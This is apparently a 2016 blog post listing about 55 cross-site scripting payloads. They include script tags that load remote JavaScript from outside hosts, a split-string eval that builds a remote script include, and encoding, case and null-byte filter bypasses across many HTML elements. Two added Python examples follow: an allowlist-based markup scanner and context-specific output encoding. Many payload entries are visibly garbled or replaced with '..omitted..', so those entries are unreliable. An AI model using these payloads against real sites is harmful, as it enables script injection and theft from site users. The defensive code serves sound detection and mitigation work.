
XSS attack roundup

Posted on 2016-4-28 10:06:15
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, since there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, variant 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, variant 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (an open angle bracket followed by a word starting with a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>

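The encoding tricks in items (3) to (19) (case variants, numeric entities with and without semicolons, embedded tab/newline/CR, null bytes, leading blanks) and the element and attribute vectors in items (20) to (55) carry one lesson for the defender: normalise the value the way a browser will before you inspect it, and allowlist what is acceptable rather than blocklist what is known. The Python below is an added example, not code from the original post. It decodes entities and strips control characters before reading a URL scheme, applies a scheme allowlist, and scans an untrusted HTML fragment with the standard-library parser for event-handler attributes, URL-bearing attributes with a disallowed scheme, CSS `expression()`/`url(javascript:)` and elements that can load or run code. The allowed-scheme set, the blocked-element set and the sample inputs are assumptions constructed for the example.

```python
import html
import re
from html.parser import HTMLParser
from typing import List, Optional

# Added example, not from the original post. Defensive scanner for untrusted
# markup: normalise URL-bearing values as a browser does before it interprets
# the scheme, allowlist schemes, and flag the vector classes listed above.
# The three sets below are assumptions made for this example.
ALLOWED_SCHEMES = {"http", "https"}          # relative URLs (no scheme) are also accepted
URL_ATTRS = {"src", "href", "background", "dynsrc", "lowsrc", "action", "data"}
BLOCKED_TAGS = {"script", "iframe", "frame", "frameset", "embed", "object",
                "base", "meta", "link", "style", "bgsound"}

_CONTROL = re.compile(r"[\x00-\x20\x7f]")    # NUL, tab, LF, CR, space, DEL, ...
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")
# CSS expression() and url(javascript:...) as used in items (39) and (46)-(53).
# CSS backslash escapes are not decoded here; a full CSS tokenizer would be needed for that.
_CSS_DANGER = re.compile(r"expression\s*\(|url\s*\(\s*['\"]?\s*(?:javascript|vbscript)\s*:", re.I)


def normalize_url(value: str) -> str:
    """Decode HTML entities (decimal or hex, with or without semicolons) and
    drop every ASCII control character. Browsers strip only tab/LF/CR and
    leading blanks; removing all controls is stricter, which is the safe
    direction for a check that must not be bypassed by a NUL (item 17)."""
    return _CONTROL.sub("", html.unescape(value))


def url_scheme(value: str) -> Optional[str]:
    """Lower-cased scheme of the normalised value, or None for a relative URL."""
    m = _SCHEME.match(normalize_url(value).lower())
    return m.group(1) if m else None


def is_safe_url(value: str) -> bool:
    """Allowlist: relative URLs and ALLOWED_SCHEMES pass; javascript:, vbscript:,
    data: and anything unexpected fail, whatever encoding was used."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


class UntrustedMarkupScanner(HTMLParser):
    """Collects findings for detection and logging; it does not rewrite markup."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in BLOCKED_TAGS:
            self.findings.append(f"blocked element <{tag}>")
        for name, value in attrs:
            value = value or ""            # HTMLParser already entity-decodes attribute values
            if name.startswith("on"):      # onclick, onload, oncut, ... (items 99, 21)
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and not is_safe_url(value):
                self.findings.append(f"unsafe scheme {url_scheme(value)!r} in {name} of <{tag}>")
            elif name == "style" and _CSS_DANGER.search(normalize_url(value)):
                self.findings.append(f"dangerous CSS in style of <{tag}>")


def scan_markup(fragment: str) -> List[str]:
    """Findings for one untrusted fragment; an empty list means nothing was flagged."""
    scanner = UntrustedMarkupScanner()
    scanner.feed(fragment)
    scanner.close()
    return scanner.findings


# Constructed samples modelled on the vector classes above (test data, not live input).
SAMPLES = [
    ("<IMG SRC=javascript:alert('XSS')>", True),
    ("<IMG SRC=JaVaScRiPt:alert('XSS')>", True),
    ("<IMG SRC=\"jav&#x09;ascript:alert('XSS')\">", True),     # encoded tab, item (12)
    ("<zzz onclick=alert`1`>clickme</zzz>", True),
    ("<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>", True),
    ("<BODY BACKGROUND=\"javascript:alert('XSS')\">", True),
    ("<DIV STYLE=\"width: expression(alert('XSS'));\">", True),
    ('<p>Hello <a href="https://example.com/">site</a> <img src="/pics/a.png" alt="x"></p>', False),
]


def run_samples() -> bool:
    """True when every sample is classified as expected (flagged or clean)."""
    return all(bool(scan_markup(markup)) == expected for markup, expected in SAMPLES)


if __name__ == "__main__":
    for markup, _ in SAMPLES:
        print(markup, "->", scan_markup(markup) or "clean")
```

Two limits worth knowing: a scheme check says nothing about protocol-relative URLs such as `//3w.org/XSS/xss.js` in item (25), which is why the element allowlist and a Content-Security-Policy matter as much as the URL check; and scanning is detection, not a substitute for context-aware output encoding at the point where the value is written into the page.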
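Items (23), (29) and (30) each break out of a different output context: element content, a JavaScript string literal, and the TITLE element. The mitigation is encoding chosen per context at the point of output, not a filter on input. The Python below is an added example, not code from the original post: it encodes one untrusted value for each of the three contexts, and then feeds the rendered result back through the standard-library HTML parser to confirm that only the template's own elements exist. The template, the function names and the hostile sample values are assumptions constructed for the example.

```python
import html
import json
from html.parser import HTMLParser
from typing import List, Tuple

# Added example, not from the original post: context-specific output encoding,
# plus a parser-based check that the rendered page contains only the
# template's own elements. Names and sample values are constructed here.

# Characters escaped in a JS string beyond what JSON requires, so the HTML
# parser can never see "</script>" inside the literal.
_JS_EXTRA = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}


def to_html_text(value: str) -> str:
    """Element content (items 23, 30): no raw '<' survives, so no element can start."""
    return html.escape(value, quote=True)


def to_html_attr(value: str) -> str:
    """Double-quoted attribute value: quotes are encoded, so the attribute cannot be
    closed early. Same escaping as text here because the template always quotes
    attributes; an unquoted attribute would need far stricter treatment."""
    return html.escape(value, quote=True)


def to_js_string_literal(value: str) -> str:
    """JavaScript string literal (item 29): json.dumps escapes backslash and quote,
    so a leading backslash in the input cannot cancel the closing quote, and
    '<', '>' and '&' are written as \\uXXXX so the script block cannot be ended."""
    literal = json.dumps(value)          # ensure_ascii also escapes U+2028/U+2029
    for ch, esc in _JS_EXTRA.items():
        literal = literal.replace(ch, esc)
    return literal


def js_literal_round_trips(value: str) -> bool:
    """The escaped literal must still decode to exactly the original value."""
    return json.loads(to_js_string_literal(value)) == value


def render_profile(display_name: str, homepage_title: str, bio: str) -> str:
    """Constructed template placing one untrusted value in each of three contexts."""
    return (
        f"<title>{to_html_text(display_name)}</title>\n"
        f'<span title="{to_html_attr(homepage_title)}">{to_html_text(display_name)}</span>\n'
        f"<script>var bio = {to_js_string_literal(bio)};</script>"
    )


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, with its attribute names."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[Tuple[str, List[str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [name for name, _ in attrs]))


def rendered_tags(fragment: str) -> List[Tuple[str, List[str]]]:
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


# What the template itself contributes; anything beyond this came from user data.
TEMPLATE_TAGS = [("title", []), ("span", ["title"]), ("script", [])]

# Constructed hostile inputs modelled on items (30), (99) and (29).
HOSTILE_NAME = '</TITLE><SCRIPT>alert("XSS");</SCRIPT>'
HOSTILE_ATTR = '" onclick="alert(1)//'
HOSTILE_JS = '\\";alert(\'XSS\');//</script><script>alert(2)</script>'


def hostile_inputs_stay_inert() -> bool:
    """True when the hostile values add no element or attribute and the JS value survives intact."""
    page = render_profile(HOSTILE_NAME, HOSTILE_ATTR, HOSTILE_JS)
    return rendered_tags(page) == TEMPLATE_TAGS and js_literal_round_trips(HOSTILE_JS)


if __name__ == "__main__":
    print(render_profile(HOSTILE_NAME, HOSTILE_ATTR, HOSTILE_JS))
    print("inert:", hostile_inputs_stay_inert())
```

The parser round trip is the useful habit here: rather than arguing about whether a filter would have caught a given payload, render the page with the hostile value and assert on what an HTML parser actually finds.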